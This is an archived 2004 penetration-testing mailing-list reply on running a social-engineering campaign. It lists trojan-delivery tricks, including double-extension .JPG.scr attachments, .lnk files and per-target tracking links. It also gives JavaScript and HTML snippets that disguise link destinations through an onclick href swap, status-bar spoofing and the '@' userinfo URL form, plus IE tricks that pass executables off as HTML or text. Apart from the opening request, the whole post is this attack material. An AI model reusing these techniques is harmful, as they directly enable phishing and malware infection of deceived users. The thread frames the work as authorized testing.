Penetration Testing mailing list archives
Re: Social Engineering Website (URL obfuscation/hiding)
From: Martin Mačok <martin.macok () underground cz>
Date: Sat, 10 Jan 2004 08:59:16 +0100
On Fri, Jan 09, 2004 at 06:32:48AM -0800, Random Task wrote:
As a last note, we'd need to get people to go there. Making it look legit would be good. (i.e. use the %00 IE exploit to make the URL look like it's internal and make the site look like their own) Any techniques or message styles you've used and had success with?
- send the trojan code in an email attachment with a good old something.JPG.scr trick (if you can go to them, they don't have to go to you) - some content filters disallow .scr, so try .lnk also - send a link to the trojan file, in typical MS Outlook environment, they just have to click on it and select "Open" - use unique URL/file for each target (so you can track downloads and email forwards) URL obfuscation/hiding: <script language="JavaScript"> <!-- function changehref() { document.all("obj").href = "http://www.fakesite.com" ; return 1 ; } //--> </script> [snip] <a href="http://www.realsite.com/" id="obj" onclick="changehref();">www.fakesite.com</a> Similar trick: <a href="http://www.realsite.com" onmouseover="window.status=('http://www.fakesite.com/'); return true;">www.fakesite.com</a> Some more recent SCAM trick: <a href="http://www.fakesite.com:something_ugly_long () www realsite com/"> www.fakesite.com</a> Other MS IE trick (browser believes it's a HTML instead of EXE): http://server/file.exe?.html As you mention, MS IE's (and possibly some other browser's) %00 trick: README.TXT%00PROG.EXE in Content-disposition: (there are many different tricks with %00) See also: http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/IE/index.html http://www.solutions.fi/iebug2 -- Martin Mačok http://underground.cz/ martin.macok () underground cz http://Xtrmntr.org/ORBman/ --------------------------------------------------------------------------- ----------------------------------------------------------------------------
Current thread:
- Social Engineering Website Random Task (Jan 09)
- Re: Social Engineering Website (and Trojan test) Martin Mačok (Jan 12)
- Converting raw 802.11 (rfmon) capture file to standard libpcap Jerry Shenk (Jan 12)
- Re: Converting raw 802.11 (rfmon) capture file to standard libpcap James Golovich (Jan 12)
- RE: Converting raw 802.11 (rfmon) capture file to standard libpcap Jerry Shenk (Jan 12)
- Re: Converting raw 802.11 (rfmon) capture file to standard libpcap Aaron Turner (Jan 13)
- Re: Converting raw 802.11 (rfmon) capture file to standard libpcap James Golovich (Jan 12)
- RE: Converting raw 802.11 (rfmon) capture file to standard libpcap Chris Eagle (Jan 12)
- Re: Social Engineering Website (URL obfuscation/hiding) Martin Mačok (Jan 12)
- Re: Social Engineering Website Nicolas Gregoire (Jan 13)
- <Possible follow-ups>
- RE: Social Engineering Website Otero, Hernan (EDS) (Jan 12)